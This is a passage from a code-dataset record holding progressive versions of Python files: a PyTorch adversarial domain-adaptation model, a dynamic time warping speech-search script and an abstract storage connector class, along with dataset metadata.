unlabeled_loaders, unlabeled_iters = (self\n .prepare_data(d))\n self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.\n F_hidden_sizes, opt.shared_hidden_size, opt.dropout)\n self.F_d = {}\n for domain in opt.domains:\n self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],\n opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)\n self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +\n opt.domain_hidden_size, opt.shared_hidden_size + opt.\n domain_hidden_size, 2, opt.dropout, opt.C_bn)\n self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt\n .shared_hidden_size, len(opt.all_domains), opt.loss, opt.\n dropout, opt.D_bn)\n self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.\n device), self.D.to(opt.device)\n for f_d in self.F_d.values():\n f_d = f_d.to(opt.device)\n optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.\n parameters() if self.F_s else [], self.C.parameters()] + [f.\n parameters() for f in self.F_d.values()])), lr=0.0001)\n optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)\n loss_d_res = []\n l_d_res = []\n l_c_res = []\n for epoch in range(opt.max_epoch):\n self.F_s.train()\n self.C.train()\n self.D.train()\n for f in self.F_d.values():\n f.train()\n correct, total = defaultdict(int), defaultdict(int)\n d_correct, d_total = 0, 0\n num_iter = len(train_loaders[opt.domains[0]])\n for i in range(num_iter):\n utils.freeze_net(self.F_s)\n map(utils.freeze_net, self.F_d.values())\n utils.freeze_net(self.C)\n utils.unfreeze_net(self.D)\n n_critic = opt.n_critic\n for _ in range(n_critic):\n self.D.zero_grad()\n loss_d = {}\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n _, pred = torch.max(d_outputs, 1)\n d_total += 
len(d_inputs)\n if opt.loss.lower() == 'l2':\n _, tgt_indices = torch.max(d_targets, 1)\n d_correct += (pred == tgt_indices).sum().item()\n l_d = functional.mse_loss(d_outputs, d_targets)\n l_d.backward()\n else:\n d_correct += (pred == d_targets).sum().item()\n l_d = functional.nll_loss(d_outputs, d_targets)\n l_d.backward()\n loss_d[domain] = l_d.item()\n optimizerD.step()\n utils.unfreeze_net(self.F_s)\n map(utils.unfreeze_net, self.F_d.values())\n utils.unfreeze_net(self.C)\n utils.freeze_net(self.D)\n self.F_s.zero_grad()\n for f_d in self.F_d.values():\n f_d.zero_grad()\n self.C.zero_grad()\n shared_feats, domain_feats = [], []\n for domain in opt.domains:\n inputs, targets = utils.endless_get_next_batch(\n train_loaders, train_iters, domain)\n targets = targets.to(opt.device)\n inputs = inputs.to(opt.device)\n shared_feat = self.F_s(inputs)\n shared_feats.append(shared_feat)\n domain_feat = self.F_d[domain](inputs)\n domain_feats.append(domain_feat)\n features = torch.cat((shared_feat, domain_feat), dim=1)\n c_outputs = self.C(features)\n l_c = functional.nll_loss(c_outputs, targets)\n l_c.backward(retain_graph=True)\n _, pred = torch.max(c_outputs, 1)\n total[domain] += targets.size(0)\n correct[domain] += (pred == targets).sum().item()\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n if opt.loss.lower() == 'gr':\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n l_d = functional.nll_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= -opt.lambd\n elif opt.loss.lower() == 'l2':\n d_targets = utils.get_random_domain_label(opt.loss,\n len(d_inputs))\n l_d = functional.mse_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= opt.lambd\n l_d.backward()\n optimizer.step()\n loss_d_res.append(loss_d['test'])\n l_d_res.append(l_d.item())\n 
l_c_res.append(l_c.item())\n if (epoch + 1) % kwargs['display_step'] == 0:\n print('Epoch:', '%04d, done' % (epoch + 1))\n return loss_d_res, l_d_res, l_c_res\n\n def transform(self, d, *args, **kwargs):\n F_d = self.F_d[opt.domains[0]]\n self.F_s.eval()\n F_d.eval()\n self.C.eval()\n _, _, _, it = self.prepare_data(d)\n it = it[opt.unlabeled_domains[0]]\n correct = 0\n total = 0\n confusion = ConfusionMeter(opt.num_labels)\n preds = []\n for inputs, targets in it:\n inputs = inputs.to(opt.device)\n targets = targets.to(opt.device)\n d_features = F_d(inputs)\n features = torch.cat((self.F_s(inputs), d_features), dim=1)\n outputs = self.C(features)\n _, pred = torch.max(outputs, 1)\n confusion.add(pred.data, targets.data)\n total += targets.size(0)\n correct += (pred == targets).sum().item()\n acc = correct / total\n return acc, correct\n\n def get_name(self):\n if self._name is None:\n self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)\n return self._name\n",
"step-5": "#This version assumes domains = train/test set\nimport numpy as np\nfrom ..utils import Dataset\nimport math\nimport random\nfrom .interface import TopicModel\nfrom .man_model.models import *\nfrom .man_model import utils\nfrom .man_model.options import opt\nimport torch.utils.data as data_utils\nfrom tqdm import tqdm\nfrom collections import defaultdict\nimport itertools\nfrom torchnet.meter import ConfusionMeter\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nimport torch.optim as optim\nfrom torch.utils.data import ConcatDataset, DataLoader\n\n\"\"\"\nIMPORTANT: for some reason, Model (self.F_s,etc) will not work if inputs are not float32\n=> need to convert. Dont know if same thing for target tho?\nAlso apparently, domain labels retrieved from get_domain_labels cannot be -1?\nOutput size for C HAS TO BE 2 even if it's a binary classification\n\"\"\"\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x, axis=1).reshape(-1, 1))\n return e_x / np.sum(e_x, axis=1).reshape(-1, 1)\n\nclass MultinomialAdversarialNetwork(TopicModel):\n def __init__(self, k, m, model_params=None, log_params=None):\n super().__init__(k,m,model_params,log_params)\n \n def prepare_data(self,d):\n \"\"\"\n Assume d is a dictionary of dataset where d[domain] = another dataset class\n Assume labeled domain = train set, unlabeled = test\n \"\"\"\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n #CONVERT TO FLOAT32\n features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape((-1,1))\n train = data_utils.TensorDataset(features,target)\n train_loaders[domain] = DataLoader(train, opt.batch_size, shuffle = True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = 
torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape(-1,1))\n uset = data_utils.TensorDataset(features,target)\n unlabeled_loaders[domain] = DataLoader(uset,opt.batch_size, shuffle = True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n \n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters\n \n \n def fit(self, d, *args, **kwargs):\n #minibatches = create_minibatch(X, y, z, batch_size)\n #TODO: make this able to fit consecutively\n train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = self.prepare_data(d)\n #Training\n self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.F_hidden_sizes,opt.shared_hidden_size, opt.dropout)\n self.F_d = {}\n for domain in opt.domains:\n self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1], opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)\n self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size + opt.domain_hidden_size, opt.shared_hidden_size + opt.domain_hidden_size, 2,opt.dropout, opt.C_bn)\n self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt.shared_hidden_size,len(opt.all_domains), opt.loss, opt.dropout, opt.D_bn)\n# print(\"try\")\n# print(opt.device)\n self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.device), self.D.to(opt.device)\n for f_d in self.F_d.values():\n f_d = f_d.to(opt.device)\n# print(\"endtry\")\n# # optimizers\n optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.parameters() if self.F_s else [], self.C.parameters()] + [f.parameters() for f in self.F_d.values()])), lr=0.0001)\n optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)\n loss_d_res = []\n l_d_res = []\n l_c_res = []\n for epoch in range(opt.max_epoch):\n self.F_s.train()\n self.C.train()\n self.D.train()\n for f in self.F_d.values():\n f.train()\n\n # training accuracy\n correct, total = defaultdict(int), defaultdict(int)\n # D accuracy\n d_correct, d_total = 0, 0\n # conceptually view 1 
epoch as 1 epoch of the first domain\n num_iter = len(train_loaders[opt.domains[0]])\n for i in range(num_iter):\n # D iterations\n utils.freeze_net(self.F_s)\n map(utils.freeze_net, self.F_d.values())\n utils.freeze_net(self.C)\n utils.unfreeze_net(self.D)\n # optional WGAN n_critic trick\n n_critic = opt.n_critic\n\n for _ in range(n_critic):\n self.D.zero_grad()\n loss_d = {}\n # train on both labeled and unlabeled domains\n for domain in opt.unlabeled_domains:\n # targets not used\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n d_targets = utils.get_domain_label(opt.loss, domain, len(d_inputs))\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n # D accuracy\n _, pred = torch.max(d_outputs, 1)\n d_total += len(d_inputs)\n if opt.loss.lower() == 'l2':\n _, tgt_indices = torch.max(d_targets, 1)\n d_correct += (pred==tgt_indices).sum().item()\n l_d = functional.mse_loss(d_outputs, d_targets)\n l_d.backward()\n else:\n d_correct += (pred==d_targets).sum().item()\n l_d = functional.nll_loss(d_outputs, d_targets)\n l_d.backward()\n loss_d[domain] = l_d.item()\n optimizerD.step()\n # F&C iteration\n utils.unfreeze_net(self.F_s)\n map(utils.unfreeze_net, self.F_d.values())\n utils.unfreeze_net(self.C)\n utils.freeze_net(self.D)\n #if opt.fix_emb:\n # utils.freeze_net(self.F_s.word_emb)\n # map(utils.freeze_net, self.F_d.values())\n self.F_s.zero_grad()\n for f_d in self.F_d.values():\n f_d.zero_grad()\n self.C.zero_grad()\n shared_feats, domain_feats = [], []\n for domain in opt.domains:\n inputs, targets = utils.endless_get_next_batch(\n train_loaders, train_iters, domain)\n #target = torch.int64 rn\n targets = targets.to(opt.device)\n inputs = inputs.to(opt.device)\n shared_feat = self.F_s(inputs)\n shared_feats.append(shared_feat)\n domain_feat = self.F_d[domain](inputs)\n domain_feats.append(domain_feat)\n features = torch.cat((shared_feat, domain_feat), dim=1)\n 
c_outputs = self.C(features)\n #return c_outputs, targets\n #DEVICE SIDE TRIGGERED ERROR OCCUR HERE (l_c=...)\n l_c = functional.nll_loss(c_outputs, targets)\n l_c.backward(retain_graph=True)\n # training accuracy\n _, pred = torch.max(c_outputs, 1)\n total[domain] += targets.size(0)\n correct[domain] += (pred == targets).sum().item()\n # update F with D gradients on all domains\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n if opt.loss.lower() == 'gr':\n d_targets = utils.get_domain_label(opt.loss, domain, len(d_inputs))\n l_d = functional.nll_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= -opt.lambd\n elif opt.loss.lower() == 'l2':\n d_targets = utils.get_random_domain_label(opt.loss, len(d_inputs))\n l_d = functional.mse_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= opt.lambd\n l_d.backward()\n \n\n optimizer.step()\n \n\n# print(loss_d)\n# print('l_d loss: {}'.format(l_d.item()))\n# print('l_c loss: {}'.format(l_c.item()))\n loss_d_res.append(loss_d['test'])\n l_d_res.append(l_d.item())\n l_c_res.append(l_c.item())\n if (epoch + 1) % kwargs[\"display_step\"] == 0:\n print(\n \"Epoch:\", \"%04d, done\" % (epoch + 1) #\"cost=\", \"{:.9f}\"#.format(l_d.data[0])\n )\n return loss_d_res, l_d_res, l_c_res\n \n def transform(self, d, *args, **kwargs):\n F_d = self.F_d[opt.domains[0]]\n self.F_s.eval()\n F_d.eval()\n self.C.eval()\n _,_,_,it = self.prepare_data(d)\n it = it[opt.unlabeled_domains[0]]\n correct = 0\n total = 0\n confusion = ConfusionMeter(opt.num_labels)\n preds = []\n for inputs,targets in it:\n inputs = inputs.to(opt.device)\n targets = targets.to(opt.device)\n d_features = F_d(inputs)\n features = torch.cat((self.F_s(inputs), d_features), dim=1)\n outputs = self.C(features)\n _, pred = torch.max(outputs, 1)\n #preds.extend(pred.data)\n 
confusion.add(pred.data, targets.data)\n total += targets.size(0)\n correct += (pred == targets).sum().item()\n acc = correct / total\n #('{}: Accuracy on {} samples: {}%'.format(name, total, 100.0*acc))\n return acc, correct\n #return preds\n \n def get_name(self):\n if self._name is None:\n self._name = \"MAN({},{},{})\".format(self.k,self.m,1)\n return self._name",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def buildExpectations(queryPath, searchPatternPath):
"""
Based on SpeechCommand_v0.02 directory structure.
"""
expectations = []
currentDirectory = ''
queryFilename = queryPath.split('/')[-1]
queryDirectory = queryPath.split('/')[-2]
queryCode = queryFilename.split('_')[0]
searchFileList = sorted(glob.glob(searchPatternPath))
for searchFile in searchFileList:
searchFilename = searchFile.split('/')[-1]
searchDirectory = searchFile.split('/')[-2]
searchCode = searchFilename.split('_')[0]
if searchDirectory != currentDirectory:
currentDirectory = searchDirectory
if searchCode == queryCode:
if currentDirectory == queryDirectory:
expectations.append([[0, 1]])
else:
expectations.append([[0, 0]])
return expectations
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Dynamic Time Warping')
parser.add_argument('-g', '--graph', action='store_true', help=
'Enable graph display')
parser.add_argument('-t', '--threshold', type=float, default=0.4, help=
'Set score threshold')
parser.add_argument('query_path')
parser.add_argument('search_pattern_path')
printGroup = parser.add_mutually_exclusive_group()
printGroup.add_argument('-p', '--percentage', action='store_true', help
='Enable percentage display')
printGroup.add_argument('-v', '--verbose', action='store_true', help=
'Enable verbose display')
args = parser.parse_args()
GRAPH = args.graph
PERCENTAGE = args.percentage
threshold = args.threshold
VERBOSE = args.verbose
queryPath = args.query_path
searchPatternPath = args.search_pattern_path
dtw.VERBOSE = VERBOSE
stats.VERBOSE = VERBOSE
labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)
results = dtw.computeResultsPrecisely(sweepList, threshold,
positiveOnly=True)
for i, result in enumerate(results):
print(labels[i] + ': ', end='')
for j, (hitIndex, _) in enumerate(result):
print(hitIndex * 3, end='')
if j < len(result) - 1:
print(' | ', end='')
print()
if GRAPH:
dtw.showSweeps(labels, sweepList, bestList)
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
GRAPH = False
PERCENTAGE = False
VERBOSE = False
def buildExpectations(queryPath, searchPatternPath):
"""
Based on SpeechCommand_v0.02 directory structure.
"""
expectations = []
currentDirectory = ''
queryFilename = queryPath.split('/')[-1]
queryDirectory = queryPath.split('/')[-2]
queryCode = queryFilename.split('_')[0]
searchFileList = sorted(glob.glob(searchPatternPath))
for searchFile in searchFileList:
searchFilename = searchFile.split('/')[-1]
searchDirectory = searchFile.split('/')[-2]
searchCode = searchFilename.split('_')[0]
if searchDirectory != currentDirectory:
currentDirectory = searchDirectory
if searchCode == queryCode:
if currentDirectory == queryDirectory:
expectations.append([[0, 1]])
else:
expectations.append([[0, 0]])
return expectations
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Dynamic Time Warping')
parser.add_argument('-g', '--graph', action='store_true', help=
'Enable graph display')
parser.add_argument('-t', '--threshold', type=float, default=0.4, help=
'Set score threshold')
parser.add_argument('query_path')
parser.add_argument('search_pattern_path')
printGroup = parser.add_mutually_exclusive_group()
printGroup.add_argument('-p', '--percentage', action='store_true', help
='Enable percentage display')
printGroup.add_argument('-v', '--verbose', action='store_true', help=
'Enable verbose display')
args = parser.parse_args()
GRAPH = args.graph
PERCENTAGE = args.percentage
threshold = args.threshold
VERBOSE = args.verbose
queryPath = args.query_path
searchPatternPath = args.search_pattern_path
dtw.VERBOSE = VERBOSE
stats.VERBOSE = VERBOSE
labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)
results = dtw.computeResultsPrecisely(sweepList, threshold,
positiveOnly=True)
for i, result in enumerate(results):
print(labels[i] + ': ', end='')
for j, (hitIndex, _) in enumerate(result):
print(hitIndex * 3, end='')
if j < len(result) - 1:
print(' | ', end='')
print()
if GRAPH:
dtw.showSweeps(labels, sweepList, bestList)
plt.show()
<|reserved_special_token_1|>
import dtw
import stats
import glob
import argparse
import matplotlib.pyplot as plt
GRAPH = False
PERCENTAGE = False
VERBOSE = False
def buildExpectations(queryPath, searchPatternPath):
"""
Based on SpeechCommand_v0.02 directory structure.
"""
expectations = []
currentDirectory = ''
queryFilename = queryPath.split('/')[-1]
queryDirectory = queryPath.split('/')[-2]
queryCode = queryFilename.split('_')[0]
searchFileList = sorted(glob.glob(searchPatternPath))
for searchFile in searchFileList:
searchFilename = searchFile.split('/')[-1]
searchDirectory = searchFile.split('/')[-2]
searchCode = searchFilename.split('_')[0]
if searchDirectory != currentDirectory:
currentDirectory = searchDirectory
if searchCode == queryCode:
if currentDirectory == queryDirectory:
expectations.append([[0, 1]])
else:
expectations.append([[0, 0]])
return expectations
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Dynamic Time Warping')
parser.add_argument('-g', '--graph', action='store_true', help=
'Enable graph display')
parser.add_argument('-t', '--threshold', type=float, default=0.4, help=
'Set score threshold')
parser.add_argument('query_path')
parser.add_argument('search_pattern_path')
printGroup = parser.add_mutually_exclusive_group()
printGroup.add_argument('-p', '--percentage', action='store_true', help
='Enable percentage display')
printGroup.add_argument('-v', '--verbose', action='store_true', help=
'Enable verbose display')
args = parser.parse_args()
GRAPH = args.graph
PERCENTAGE = args.percentage
threshold = args.threshold
VERBOSE = args.verbose
queryPath = args.query_path
searchPatternPath = args.search_pattern_path
dtw.VERBOSE = VERBOSE
stats.VERBOSE = VERBOSE
labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)
results = dtw.computeResultsPrecisely(sweepList, threshold,
positiveOnly=True)
for i, result in enumerate(results):
print(labels[i] + ': ', end='')
for j, (hitIndex, _) in enumerate(result):
print(hitIndex * 3, end='')
if j < len(result) - 1:
print(' | ', end='')
print()
if GRAPH:
dtw.showSweeps(labels, sweepList, bestList)
plt.show()
<|reserved_special_token_1|>
import dtw
import stats
import glob
import argparse
import matplotlib.pyplot as plt
GRAPH = False
PERCENTAGE = False
VERBOSE = False
def buildExpectations(queryPath, searchPatternPath):
"""
Based on SpeechCommand_v0.02 directory structure.
"""
expectations = []
currentDirectory = ""
queryFilename = queryPath.split("/")[-1]
queryDirectory = queryPath.split("/")[-2]
queryCode = queryFilename.split("_")[0]
searchFileList = sorted(glob.glob(searchPatternPath))
for searchFile in searchFileList:
searchFilename = searchFile.split("/")[-1]
searchDirectory = searchFile.split("/")[-2]
searchCode = searchFilename.split("_")[0]
if searchDirectory != currentDirectory:
currentDirectory = searchDirectory
if searchCode == queryCode:
if currentDirectory == queryDirectory:
expectations.append([[0, 1]])
else:
expectations.append([[0, 0]])
return expectations
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser(description='Dynamic Time Warping')
parser.add_argument('-g', '--graph', action='store_true', help='Enable graph display')
parser.add_argument('-t', '--threshold', type=float, default=0.4, help='Set score threshold')
parser.add_argument('query_path')
parser.add_argument('search_pattern_path')
printGroup = parser.add_mutually_exclusive_group()
printGroup.add_argument('-p', '--percentage', action='store_true', help='Enable percentage display')
printGroup.add_argument('-v', '--verbose', action='store_true', help='Enable verbose display')
args = parser.parse_args()
GRAPH = args.graph
PERCENTAGE = args.percentage
threshold = args.threshold
VERBOSE = args.verbose
queryPath = args.query_path
searchPatternPath = args.search_pattern_path
dtw.VERBOSE = VERBOSE
stats.VERBOSE = VERBOSE
labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)
results = dtw.computeResultsPrecisely(sweepList, threshold, positiveOnly=True)
for i, result in enumerate(results):
print(labels[i] + ": ", end='')
for j, (hitIndex, _) in enumerate(result):
print(hitIndex * 3, end='')
if j < len(result) - 1:
print(" | ", end='')
print()
if GRAPH:
dtw.showSweeps(labels, sweepList, bestList)
plt.show()
|
flexible
|
{
"blob_id": "03fb1cf0aac0c37858dd8163562a7139ed4e1179",
"index": 776,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef buildExpectations(queryPath, searchPatternPath):\n \"\"\"\n Based on SpeechCommand_v0.02 directory structure.\n \"\"\"\n expectations = []\n currentDirectory = ''\n queryFilename = queryPath.split('/')[-1]\n queryDirectory = queryPath.split('/')[-2]\n queryCode = queryFilename.split('_')[0]\n searchFileList = sorted(glob.glob(searchPatternPath))\n for searchFile in searchFileList:\n searchFilename = searchFile.split('/')[-1]\n searchDirectory = searchFile.split('/')[-2]\n searchCode = searchFilename.split('_')[0]\n if searchDirectory != currentDirectory:\n currentDirectory = searchDirectory\n if searchCode == queryCode:\n if currentDirectory == queryDirectory:\n expectations.append([[0, 1]])\n else:\n expectations.append([[0, 0]])\n return expectations\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Dynamic Time Warping')\n parser.add_argument('-g', '--graph', action='store_true', help=\n 'Enable graph display')\n parser.add_argument('-t', '--threshold', type=float, default=0.4, help=\n 'Set score threshold')\n parser.add_argument('query_path')\n parser.add_argument('search_pattern_path')\n printGroup = parser.add_mutually_exclusive_group()\n printGroup.add_argument('-p', '--percentage', action='store_true', help\n ='Enable percentage display')\n printGroup.add_argument('-v', '--verbose', action='store_true', help=\n 'Enable verbose display')\n args = parser.parse_args()\n GRAPH = args.graph\n PERCENTAGE = args.percentage\n threshold = args.threshold\n VERBOSE = args.verbose\n queryPath = args.query_path\n searchPatternPath = args.search_pattern_path\n dtw.VERBOSE = VERBOSE\n stats.VERBOSE = VERBOSE\n labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)\n results = dtw.computeResultsPrecisely(sweepList, threshold,\n positiveOnly=True)\n for i, result in enumerate(results):\n print(labels[i] + ': ', end='')\n for j, (hitIndex, _) in enumerate(result):\n print(hitIndex * 3, 
end='')\n if j < len(result) - 1:\n print(' | ', end='')\n print()\n if GRAPH:\n dtw.showSweeps(labels, sweepList, bestList)\n plt.show()\n",
"step-3": "<mask token>\nGRAPH = False\nPERCENTAGE = False\nVERBOSE = False\n\n\ndef buildExpectations(queryPath, searchPatternPath):\n \"\"\"\n Based on SpeechCommand_v0.02 directory structure.\n \"\"\"\n expectations = []\n currentDirectory = ''\n queryFilename = queryPath.split('/')[-1]\n queryDirectory = queryPath.split('/')[-2]\n queryCode = queryFilename.split('_')[0]\n searchFileList = sorted(glob.glob(searchPatternPath))\n for searchFile in searchFileList:\n searchFilename = searchFile.split('/')[-1]\n searchDirectory = searchFile.split('/')[-2]\n searchCode = searchFilename.split('_')[0]\n if searchDirectory != currentDirectory:\n currentDirectory = searchDirectory\n if searchCode == queryCode:\n if currentDirectory == queryDirectory:\n expectations.append([[0, 1]])\n else:\n expectations.append([[0, 0]])\n return expectations\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Dynamic Time Warping')\n parser.add_argument('-g', '--graph', action='store_true', help=\n 'Enable graph display')\n parser.add_argument('-t', '--threshold', type=float, default=0.4, help=\n 'Set score threshold')\n parser.add_argument('query_path')\n parser.add_argument('search_pattern_path')\n printGroup = parser.add_mutually_exclusive_group()\n printGroup.add_argument('-p', '--percentage', action='store_true', help\n ='Enable percentage display')\n printGroup.add_argument('-v', '--verbose', action='store_true', help=\n 'Enable verbose display')\n args = parser.parse_args()\n GRAPH = args.graph\n PERCENTAGE = args.percentage\n threshold = args.threshold\n VERBOSE = args.verbose\n queryPath = args.query_path\n searchPatternPath = args.search_pattern_path\n dtw.VERBOSE = VERBOSE\n stats.VERBOSE = VERBOSE\n labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)\n results = dtw.computeResultsPrecisely(sweepList, threshold,\n positiveOnly=True)\n for i, result in enumerate(results):\n print(labels[i] + ': ', end='')\n for j, (hitIndex, _) 
in enumerate(result):\n print(hitIndex * 3, end='')\n if j < len(result) - 1:\n print(' | ', end='')\n print()\n if GRAPH:\n dtw.showSweeps(labels, sweepList, bestList)\n plt.show()\n",
"step-4": "import dtw\nimport stats\nimport glob\nimport argparse\nimport matplotlib.pyplot as plt\nGRAPH = False\nPERCENTAGE = False\nVERBOSE = False\n\n\ndef buildExpectations(queryPath, searchPatternPath):\n \"\"\"\n Based on SpeechCommand_v0.02 directory structure.\n \"\"\"\n expectations = []\n currentDirectory = ''\n queryFilename = queryPath.split('/')[-1]\n queryDirectory = queryPath.split('/')[-2]\n queryCode = queryFilename.split('_')[0]\n searchFileList = sorted(glob.glob(searchPatternPath))\n for searchFile in searchFileList:\n searchFilename = searchFile.split('/')[-1]\n searchDirectory = searchFile.split('/')[-2]\n searchCode = searchFilename.split('_')[0]\n if searchDirectory != currentDirectory:\n currentDirectory = searchDirectory\n if searchCode == queryCode:\n if currentDirectory == queryDirectory:\n expectations.append([[0, 1]])\n else:\n expectations.append([[0, 0]])\n return expectations\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Dynamic Time Warping')\n parser.add_argument('-g', '--graph', action='store_true', help=\n 'Enable graph display')\n parser.add_argument('-t', '--threshold', type=float, default=0.4, help=\n 'Set score threshold')\n parser.add_argument('query_path')\n parser.add_argument('search_pattern_path')\n printGroup = parser.add_mutually_exclusive_group()\n printGroup.add_argument('-p', '--percentage', action='store_true', help\n ='Enable percentage display')\n printGroup.add_argument('-v', '--verbose', action='store_true', help=\n 'Enable verbose display')\n args = parser.parse_args()\n GRAPH = args.graph\n PERCENTAGE = args.percentage\n threshold = args.threshold\n VERBOSE = args.verbose\n queryPath = args.query_path\n searchPatternPath = args.search_pattern_path\n dtw.VERBOSE = VERBOSE\n stats.VERBOSE = VERBOSE\n labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)\n results = dtw.computeResultsPrecisely(sweepList, threshold,\n positiveOnly=True)\n for i, result in 
enumerate(results):\n print(labels[i] + ': ', end='')\n for j, (hitIndex, _) in enumerate(result):\n print(hitIndex * 3, end='')\n if j < len(result) - 1:\n print(' | ', end='')\n print()\n if GRAPH:\n dtw.showSweeps(labels, sweepList, bestList)\n plt.show()\n",
"step-5": "import dtw\nimport stats\n\nimport glob\nimport argparse\nimport matplotlib.pyplot as plt\n\nGRAPH = False\nPERCENTAGE = False\nVERBOSE = False\n\ndef buildExpectations(queryPath, searchPatternPath):\n \"\"\"\n Based on SpeechCommand_v0.02 directory structure.\n \"\"\"\n expectations = []\n currentDirectory = \"\"\n queryFilename = queryPath.split(\"/\")[-1]\n queryDirectory = queryPath.split(\"/\")[-2]\n queryCode = queryFilename.split(\"_\")[0]\n searchFileList = sorted(glob.glob(searchPatternPath))\n for searchFile in searchFileList:\n searchFilename = searchFile.split(\"/\")[-1]\n searchDirectory = searchFile.split(\"/\")[-2]\n searchCode = searchFilename.split(\"_\")[0]\n if searchDirectory != currentDirectory:\n currentDirectory = searchDirectory\n if searchCode == queryCode:\n if currentDirectory == queryDirectory:\n expectations.append([[0, 1]])\n else:\n expectations.append([[0, 0]])\n return expectations\n\nif __name__ == \"__main__\":\n # Parse arguments\n parser = argparse.ArgumentParser(description='Dynamic Time Warping')\n parser.add_argument('-g', '--graph', action='store_true', help='Enable graph display')\n parser.add_argument('-t', '--threshold', type=float, default=0.4, help='Set score threshold')\n parser.add_argument('query_path')\n parser.add_argument('search_pattern_path')\n\n printGroup = parser.add_mutually_exclusive_group()\n printGroup.add_argument('-p', '--percentage', action='store_true', help='Enable percentage display')\n printGroup.add_argument('-v', '--verbose', action='store_true', help='Enable verbose display')\n\n args = parser.parse_args()\n\n GRAPH = args.graph\n PERCENTAGE = args.percentage\n threshold = args.threshold\n VERBOSE = args.verbose\n queryPath = args.query_path\n searchPatternPath = args.search_pattern_path\n\n dtw.VERBOSE = VERBOSE\n stats.VERBOSE = VERBOSE\n\n labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)\n\n results = dtw.computeResultsPrecisely(sweepList, threshold, 
positiveOnly=True)\n for i, result in enumerate(results):\n print(labels[i] + \": \", end='')\n for j, (hitIndex, _) in enumerate(result):\n print(hitIndex * 3, end='')\n if j < len(result) - 1:\n print(\" | \", end='')\n print()\n\n if GRAPH:\n dtw.showSweeps(labels, sweepList, bestList)\n\n plt.show()\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
import abc
class Connector:
"""@abc.abstractmethod
def connect(self):
pass
"""
@abc.abstractmethod
def save(self, item):
pass
@abc.abstractmethod
def load_all(self):
pass
@abc.abstractmethod
def load_by_id(self, id):
pass
@abc.abstractmethod
def update_item(self, item):
pass
@abc.abstractmethod
def get_last_id(self):
pass
@abc.abstractmethod
def get_done_items(self):
pass
"""@abc.abstractmethod
def close(self):
pass"""
|
normal
|
{
"blob_id": "ac46aa6f8f4f01b6f3c48532533b9dd41a8a1c1c",
"index": 7007,
